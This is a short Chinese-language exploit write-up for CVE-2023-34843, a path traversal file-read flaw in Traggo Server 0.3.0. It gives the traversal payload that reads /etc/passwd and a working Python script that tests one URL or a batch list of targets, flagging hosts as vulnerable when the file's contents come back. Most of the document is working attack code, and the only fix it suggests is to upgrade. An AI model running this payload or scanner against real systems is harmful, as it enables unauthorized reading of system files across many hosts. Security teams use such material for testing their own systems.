漏洞名称
Traggo Server 文件读取(CVE-2023-34843)
利用条件
traggo/server 版本 0.3.0
漏洞原理
Traggo Server 是一个基于标签的时间跟踪工具。CVE-2023-34843 中,攻击者可构造恶意请求读取遍历系统上的文件,造成敏感信息泄漏。
漏洞利用
poc
/static/..%5c..%5c..%5c..%5cetc/passwd
(简略)poc检测脚本
支持单个url和批量测试
import requests
import argparse
import warnings
from urllib3.exceptions import InsecureRequestWarning
warnings.filterwarnings('ignore', category=InsecureRequestWarning)
header={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36"
}
def poc(url):
try:
test=requests.get(url=url,headers=header,verify=False, timeout=5)
test.raise_for_status()
payload = "/static/..%5c..%5c..%5c..%5cetc/passwd"
urll = url + payload
poc = requests.get(url=urll, headers=header, verify=False)
if 'root' in poc.text:
print(url + '有漏洞')
else:
print(url + '无漏洞')
except requests.exceptions.Timeout:
# 如果请求超时,则输出错误消息
print(url+'请求超时')
except requests.exceptions.RequestException as e:
# 如果请求失败,则输出错误消息
print(url+'请求失败')
def main():
parser=argparse.ArgumentParser()
parser.add_argument('-u',dest='url',help='输入url')
parser.add_argument('-f',dest='files',help='批量测试')
args=parser.parse_args()
if args.url:
poc(args.url)
elif args.files:
with open (f"{args.files}",'r') as urls:
for url in urls:
u=url.strip()
url=u.replace('%0a', '')
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
poc(url)
else:
print('-h 帮助')
if __name__ == '__main__':
main()
修复建议
升级版本